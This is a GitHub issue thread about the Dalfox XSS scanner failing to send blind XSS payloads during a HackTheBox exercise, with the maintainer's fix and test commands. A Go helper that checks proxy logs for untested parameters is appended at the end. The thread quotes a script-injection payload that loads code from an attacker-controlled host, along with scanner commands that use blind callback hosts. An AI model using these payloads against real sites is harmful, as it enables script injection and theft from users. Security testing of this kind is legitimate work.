
Dalfox Not Testing Blind XSS #409

Closed
tekcap opened this issue Sep 26, 2022 · 7 comments
Labels
bug Something isn't working

Comments

@tekcap

tekcap commented Sep 26, 2022

Running a very basic Blind XSS command against a hackthebox target and it doesn't look like Dalfox is even using the blind payload.

dalfox url "http://IP/hijacking/index.php?fullname=x&username=x&password=x&email=dsfs%40joe.com&imgurl=a" -b http://IP:8080 --skip-bav --debug --skip-mining-all -p imgurl -w 1

The imgurl parameter is vulnerable to this XSS payload: "><script src=http://IP:8080></script>

I'm assuming Dalfox will use that payload since it's a very basic one.

The debug shows this, but I'm not sure what it means:

[88/143 Queries][61.54%] Testing "imgurl" param and waiting headless
Sep 26 04:12:45.894 [DEBU] [toBlind] [vds] false
Sep 26 04:12:45.894 [DEBU] [toBlind] [vrs] false

Does the false mean that it's not attempting the blind payloads? All the other debug lines show me the payload that is currently being tested, but when the blind debug lines appear, they're empty, as shown above. I proxy everything through BURP and can confirm that it's not sending the blind payload.

@tekcap tekcap added the bug Something isn't working label Sep 26, 2022
@hahwul
Owner

hahwul commented Sep 26, 2022

Hi @tekcap

What is the version of dalfox? First of all, the blind XSS payload is being sent well in my env.
I need to know the exact situation, so please check it!
(blind XSS is sent in various patterns in various sections such as parameters and headers.)

dalfox url https://xss-game.appspot.com/level1/frame\?z\=1 -b hahwul.xss.ht --proxy http://localhost:8090

Screenshot 2022-09-27 12:32:30 AM

@hahwul
Owner

hahwul commented Sep 26, 2022

Oh, there's one thing I found out. Based on the current pkg, parameters other than reflected ones are not tested for blind XSS. I think this was the problem, let me check quickly!

@tekcap
Author

tekcap commented Sep 26, 2022

I'm on version v2.8.1, installed with the go command provided.

For some reason, the blind XSS doesn't even get sent in the URL parameter. I don't see the payload anywhere in BURP.

hahwul added a commit that referenced this issue Sep 26, 2022
@hahwul
Owner

hahwul commented Sep 26, 2022

@tekcap
There was a bug in the parameter analysis and I just fixed it. Please update to v2.8.2 and check it! If it is reproduced in v2.8.2, please re-open it. Thank you very much :D

How to update DalFox

Test

Param Analysis (test with --report flag)

Old
Screenshot 2022-09-27 12:54:41 AM

New
Screenshot 2022-09-27 12:55:03 AM

Blind XSS Test

./dalfox version
# v2.8.2

./dalfox url https://xss-game.appspot.com/level1/frame\?z\=1 \
      -b hahwul.xss.ht \
      --proxy http://localhost:8090

Screenshot 2022-09-27 12:57:10 AM

@hahwul hahwul closed this as completed Sep 26, 2022
@tekcap
Author

tekcap commented Oct 15, 2022

I just realized this issue still persists when using "file --rawdata" with a post request.

I think you fixed it for GET, but not POST.

I see the Referrer header is working with the blind payload, but not the parameters.

@hahwul
Owner

hahwul commented Nov 25, 2022

@tekcap
Thank you for the report! Let me check again :D
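The coverage gap reported in this thread (the blind callback reaching the Referer header or some query parameters but never others, for GET and for POST bodies) is easy to verify from a proxy history rather than by eye. The following is an added example, not code from the Dalfox project: given the target URL and the captured requests as URL/body pairs, it lists every target parameter that never carried the callback host. The hosts target.example and cb.example and the two captured requests are constructed.

```go
package main

import (
	"fmt"
	"net/url"
	"sort"
	"strings"
)

// markHits records every parameter whose value contains the callback host.
func markHits(vals url.Values, callback string, hit map[string]bool) {
	for name, vs := range vals {
		if strings.Contains(strings.Join(vs, " "), callback) {
			hit[name] = true
		}
	}
}

// MissingBlind returns the target's query parameters that never carried the
// callback host, in query or form body, across the captured URL/body pairs.
func MissingBlind(target string, reqs [][2]string, callback string) []string {
	hit := map[string]bool{}
	for _, r := range reqs {
		if u, err := url.Parse(r[0]); err == nil {
			markHits(u.Query(), callback, hit)
		}
		form, _ := url.ParseQuery(r[1]) // partial values are still returned on error
		markHits(form, callback, hit)
	}
	var missing []string
	if u, err := url.Parse(target); err == nil {
		for name := range u.Query() {
			if !hit[name] {
				missing = append(missing, name)
			}
		}
	}
	sort.Strings(missing)
	return missing
}

func main() {
	// Constructed sample: the callback host only reaches fullname (GET) and username (POST).
	target := "http://target.example/index.php?fullname=x&username=x&imgurl=a"
	reqs := [][2]string{
		{"http://target.example/index.php?fullname=%22%3E%3Cscript%20src%3D%2F%2Fcb.example%3E%3C%2Fscript%3E&username=x&imgurl=a", ""},
		{"http://target.example/index.php?fullname=x&username=x&imgurl=a", "username=%22%3E%3Cscript%20src%3D%2F%2Fcb.example%3E%3C%2Fscript%3E"},
	}
	fmt.Println(MissingBlind(target, reqs, "cb.example")) // [imgurl]
}
```

Any parameter printed here is one the scanner never exercised with the callback, which is the symptom described above for imgurl and for POST parameters.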
